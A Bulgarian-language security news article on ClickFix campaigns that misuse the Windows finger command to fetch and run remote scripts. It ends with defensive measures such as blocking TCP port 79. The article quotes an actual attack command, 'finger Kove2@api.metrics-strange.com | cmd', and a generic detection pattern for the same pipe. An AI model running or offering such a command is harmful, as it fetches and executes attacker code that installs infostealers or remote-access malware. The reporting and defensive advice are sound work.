Командата finger, създадена преди десетилетия за проверка на информация за потребители в Unix/Linux системи, преживява неочаквано „възраждане“. Атакуващи започнаха да я използват като LOLBIN (living-off-the-land binary), чрез която извличат и изпълняват отдалечени команди върху Windows устройства.

Исторически finger служи за базова справочна информация – име, директория, статус на потребителя. Макар все още да е налична в Windows, днес почти никой не я използва легитимно. Това я прави идеална за злоупотреба.

През последните седмици изследователи наблюдават нови ClickFix кампании, при които атакуващи подвеждат потребителите да изпълнят командния ред finger user@server | cmd. Полученият отговор от злонамерен Finger сървър автоматично се подава към cmd.exe – и се изпълнява локално.

Как работи атаката?

1. Социално инженерство: „Verify you are human“

Жертвите са подмамени да натиснат Win + R и да изпълнят команда, представена като необходима за „проверка, че са човек“.

Пример от Reddit:

2. Злоупотреба с Finger за извличане на скриптове

Командата:

• свързва се към Finger сървър на TCP порт 79,

• получава скрипт,

• изпълнява го мигновено чрез pipe към командния процесор.

3. Изтегляне на полезен товар

Полученият скрипт:

• генерира временна директория,

• копира curl.exe под произволно име, за да избегне детекция,

• тегли ZIP, маскиран като PDF,

• разархивира Python основен зловреден компонент,

• изпълнява го чрез pythonw.exe.

В една от версиите Python модулът вероятно е инфостийлър.

4. По-усъвършенстван вариант: NetSupport Manager RAT

В отделна кампания finger Kove2@api.metrics-strange.com | cmd:

• проверява за инструменти за анализ (Procmon, Wireshark, IDA, x64dbg и др.).
  Ако ги открие – прекратява изпълнението.

• при липса на такива – тегли ZIP, маскиран като PDF,

• разархивира NetSupport Manager RAT,

• добавя scheduled task за персистентност.

Защо finger е толкова удобен за атакуващите?

• Вграден e в Windows – не изисква външни инструменти.

• Наблюдаван рядко от EDR/AV решения.

• Използва нестандартни канали (порт 79), често пренебрегвани от защити.

• Позволява изпълнение на код без директно изтегляне на скрипт чрез pipe.

Всички тези фактори правят finger идеален за living-off-the-land атаки.

ClickFix: нарастваща заплаха

ClickFix представлява схема, при която потребителят е убеждаван да изпълни команда в PowerShell или CMD за „проверка“.

В момента злоупотребата с finger изглежда дело на един активен нападател, но честотата на нови проби и публикации в Reddit подсказва, че техниката бързо набира популярност.

Мерки за защита

За защитници най-ефективното решение е:

Блокиране на изходящи връзки към TCP порт 79

Това елиминира възможността finger да се свърже до отдалечен сървър.

Допълнителни препоръки:

• Забрана или премахване на finger.exe чрез AppLocker или WDAC.

• Засилване на EDR правила за наблюдение на необичайни child процеси от cmd.exe.

• Обучение на потребителите: никога не изпълнявайте команди, подадени от уебсайтове или „верификации“.

• Мониторинг за pipe конструкции от типа:
  finger <user>@<host> | cmd

• Ограничаване на изпълнението на curl.exe от нестандартни пътища.

Връщането на finger като инструмент за атаки показва колко лесно забравени и остарели технологии могат да се превърнат в мощен канал за компрометиране на системи.
ClickFix продължава да набира скорост, а злоупотребите с LOLBIN инструменти като finger изискват по-строга мрежова сегментация и внимателен мониторинг.